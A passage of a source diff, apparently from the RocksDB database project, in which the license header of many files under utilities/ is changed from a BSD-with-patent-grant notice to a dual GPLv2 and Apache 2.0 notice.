-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #ifndef __STDC_FORMAT_MACROS
diff --git a/utilities/blob_db/blob_dump_tool.h b/utilities/blob_db/blob_dump_tool.h
index 87d291b18ff..abba91dcad9 100644
--- a/utilities/blob_db/blob_dump_tool.h
+++ b/utilities/blob_db/blob_dump_tool.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc
index 676da330fd1..51bba2fb862 100644
--- a/utilities/blob_db/blob_file.cc
+++ b/utilities/blob_db/blob_file.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include
diff --git a/utilities/blob_db/blob_log_format.cc b/utilities/blob_db/blob_log_format.cc
index 1e55f8e6dd8..6917a290f37 100644
--- a/utilities/blob_db/blob_log_format.cc
+++ b/utilities/blob_db/blob_log_format.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h
index 4f6896455c3..b56cf205cc2 100644
--- a/utilities/blob_db/blob_log_format.h
+++ b/utilities/blob_db/blob_log_format.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Log format information shared by reader and writer.
diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc
index 19c9bf32512..3931c8669b2 100644
--- a/utilities/blob_db/blob_log_reader.cc
+++ b/utilities/blob_db/blob_log_reader.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/blob_db/blob_log_reader.h b/utilities/blob_db/blob_log_reader.h
index cff26ed6aa9..05f53fe93f7 100644
--- a/utilities/blob_db/blob_log_reader.h
+++ b/utilities/blob_db/blob_log_reader.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/utilities/blob_db/blob_log_writer.cc b/utilities/blob_db/blob_log_writer.cc
index 295624ddc97..1ffc74a4299 100644
--- a/utilities/blob_db/blob_log_writer.cc
+++ b/utilities/blob_db/blob_log_writer.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/blob_db/blob_log_writer.h b/utilities/blob_db/blob_log_writer.h
index 4443c4eeb9e..b6c7a2a9901 100644
--- a/utilities/blob_db/blob_log_writer.h
+++ b/utilities/blob_db/blob_log_writer.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/utilities/checkpoint/checkpoint_impl.cc b/utilities/checkpoint/checkpoint_impl.cc
index 3a9606af4eb..0cdddbd628d 100644
--- a/utilities/checkpoint/checkpoint_impl.cc
+++ b/utilities/checkpoint/checkpoint_impl.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 Facebook.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/checkpoint/checkpoint_impl.h b/utilities/checkpoint/checkpoint_impl.h
index 4aba0d358e4..7deea9812de 100644
--- a/utilities/checkpoint/checkpoint_impl.h
+++ b/utilities/checkpoint/checkpoint_impl.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/utilities/checkpoint/checkpoint_test.cc b/utilities/checkpoint/checkpoint_test.cc
index ec081f2902b..2872f3a426a 100644
--- a/utilities/checkpoint/checkpoint_test.cc
+++ b/utilities/checkpoint/checkpoint_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/col_buf_decoder.cc b/utilities/col_buf_decoder.cc
index 95d4426cc58..3fb31794f71 100644
--- a/utilities/col_buf_decoder.cc
+++ b/utilities/col_buf_decoder.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "utilities/col_buf_decoder.h"
 #include
diff --git a/utilities/col_buf_decoder.h b/utilities/col_buf_decoder.h
index 8231770472e..e795e4ecdfc 100644
--- a/utilities/col_buf_decoder.h
+++ b/utilities/col_buf_decoder.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/utilities/col_buf_encoder.cc b/utilities/col_buf_encoder.cc
index 4e5f7e13050..feaf5646ae9 100644
--- a/utilities/col_buf_encoder.cc
+++ b/utilities/col_buf_encoder.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "utilities/col_buf_encoder.h"
 #include
diff --git a/utilities/col_buf_encoder.h b/utilities/col_buf_encoder.h
index 38962e2e488..902879925c2 100644
--- a/utilities/col_buf_encoder.h
+++ b/utilities/col_buf_encoder.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/utilities/column_aware_encoding_exp.cc b/utilities/column_aware_encoding_exp.cc
index ff2d4c882c9..9dcd23eeddd 100644
--- a/utilities/column_aware_encoding_exp.cc
+++ b/utilities/column_aware_encoding_exp.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef __STDC_FORMAT_MACROS
 #define __STDC_FORMAT_MACROS
diff --git a/utilities/column_aware_encoding_test.cc b/utilities/column_aware_encoding_test.cc
index 039c59ef762..b99ff563a24 100644
--- a/utilities/column_aware_encoding_test.cc
+++ b/utilities/column_aware_encoding_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/column_aware_encoding_util.cc b/utilities/column_aware_encoding_util.cc
index 5fd3e3ffefa..a77d38d1df9 100644
--- a/utilities/column_aware_encoding_util.cc
+++ b/utilities/column_aware_encoding_util.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/column_aware_encoding_util.h b/utilities/column_aware_encoding_util.h
index ea3d941a3a7..385d410d157 100644
--- a/utilities/column_aware_encoding_util.h
+++ b/utilities/column_aware_encoding_util.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
index ad90437556d..43a25293456 100644
--- a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
+++ b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h
index df303e8cd38..b4a389bc1b1 100644
--- a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h
+++ b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/convenience/info_log_finder.cc b/utilities/convenience/info_log_finder.cc
index 77f7bffe21c..72c4a6275ae 100644
--- a/utilities/convenience/info_log_finder.cc
+++ b/utilities/convenience/info_log_finder.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 Facebook.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/date_tiered/date_tiered_db_impl.h b/utilities/date_tiered/date_tiered_db_impl.h
index 65c54bc73b3..2236cff8c7e 100644
--- a/utilities/date_tiered/date_tiered_db_impl.h
+++ b/utilities/date_tiered/date_tiered_db_impl.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/utilities/debug.cc b/utilities/debug.cc
index 8bd79bae18c..ce0b9580c75 100644
--- a/utilities/debug.cc
+++ b/utilities/debug.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/document/document_db.cc b/utilities/document/document_db.cc
index 8637a2a3bdd..f7b5b3b2f3d 100644
--- a/utilities/document/document_db.cc
+++ b/utilities/document/document_db.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/document/document_db_test.cc b/utilities/document/document_db_test.cc
index b1cbc33bc9f..e8f4138c0bc 100644
--- a/utilities/document/document_db_test.cc
+++ b/utilities/document/document_db_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/document/json_document.cc b/utilities/document/json_document.cc
index 38c76284731..6917923a35b 100644
--- a/utilities/document/json_document.cc
+++ b/utilities/document/json_document.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "rocksdb/utilities/json_document.h"
diff --git a/utilities/document/json_document_builder.cc b/utilities/document/json_document_builder.cc
index 6b9543fea32..7aa95e465c2 100644
--- a/utilities/document/json_document_builder.cc
+++ b/utilities/document/json_document_builder.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include
diff --git a/utilities/document/json_document_test.cc b/utilities/document/json_document_test.cc
index 43e44008841..c7bfb39f383 100644
--- a/utilities/document/json_document_test.cc
+++ b/utilities/document/json_document_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/env_librados_test.cc b/utilities/env_librados_test.cc
index 1832033d2fb..7d9b252ea41 100644
--- a/utilities/env_librados_test.cc
+++ b/utilities/env_librados_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2016, Red Hat, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/env_mirror.cc b/utilities/env_mirror.cc
index 39cac3e028d..64c0b687115 100644
--- a/utilities/env_mirror.cc
+++ b/utilities/env_mirror.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2015, Red Hat, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/utilities/env_mirror_test.cc b/utilities/env_mirror_test.cc
index 0de68b305df..2bf8ec8583a 100644
--- a/utilities/env_mirror_test.cc
+++ b/utilities/env_mirror_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2015, Red Hat, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/env_timed.cc b/utilities/env_timed.cc
index 4a222547ef7..2afa0e0b58d 100644
--- a/utilities/env_timed.cc
+++ b/utilities/env_timed.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "monitoring/perf_context_imp.h"
 #include "rocksdb/env.h"
diff --git a/utilities/env_timed_test.cc b/utilities/env_timed_test.cc
index 1d7bce6f92c..41d05e14cc5 100644
--- a/utilities/env_timed_test.cc
+++ b/utilities/env_timed_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/geodb/geodb_impl.cc b/utilities/geodb/geodb_impl.cc
index bb6aef61a17..a574e84fa37 100644
--- a/utilities/geodb/geodb_impl.cc
+++ b/utilities/geodb/geodb_impl.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/geodb/geodb_impl.h b/utilities/geodb/geodb_impl.h
index e6c61338767..6b15f542215 100644
--- a/utilities/geodb/geodb_impl.h
+++ b/utilities/geodb/geodb_impl.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/geodb/geodb_test.cc b/utilities/geodb/geodb_test.cc
index 3977f68ad7f..dcdb9825177 100644
--- a/utilities/geodb/geodb_test.cc
+++ b/utilities/geodb/geodb_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
 #include "utilities/geodb/geodb_impl.h"
diff --git a/utilities/leveldb_options/leveldb_options.cc b/utilities/leveldb_options/leveldb_options.cc
index 44f450e6904..977585fbd76 100644
--- a/utilities/leveldb_options/leveldb_options.cc
+++ b/utilities/leveldb_options/leveldb_options.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/lua/rocks_lua_compaction_filter.cc b/utilities/lua/rocks_lua_compaction_filter.cc
index 8cc3c049a1b..0934ca9c92e 100644
--- a/utilities/lua/rocks_lua_compaction_filter.cc
+++ b/utilities/lua/rocks_lua_compaction_filter.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2016, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #if defined(LUA) && !defined(ROCKSDB_LITE)
 #include "rocksdb/utilities/lua/rocks_lua_compaction_filter.h"
diff --git a/utilities/lua/rocks_lua_test.cc b/utilities/lua/rocks_lua_test.cc
index 0b05d58ef63..c075e032f7d 100644
--- a/utilities/lua/rocks_lua_test.cc
+++ b/utilities/lua/rocks_lua_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2016, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
diff --git a/utilities/memory/memory_test.cc b/utilities/memory/memory_test.cc
index 69202521a12..ee4f8740d6c 100644
--- a/utilities/memory/memory_test.cc
+++ b/utilities/memory/memory_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/memory/memory_util.cc b/utilities/memory/memory_util.cc
index 403f2f5ad9a..83bf33c1794 100644
--- a/utilities/memory/memory_util.cc
+++ b/utilities/memory/memory_util.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/merge_operators.h b/utilities/merge_operators.h
index 06c18e08f14..72f805a861d 100644
--- a/utilities/merge_operators.h
+++ b/utilities/merge_operators.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
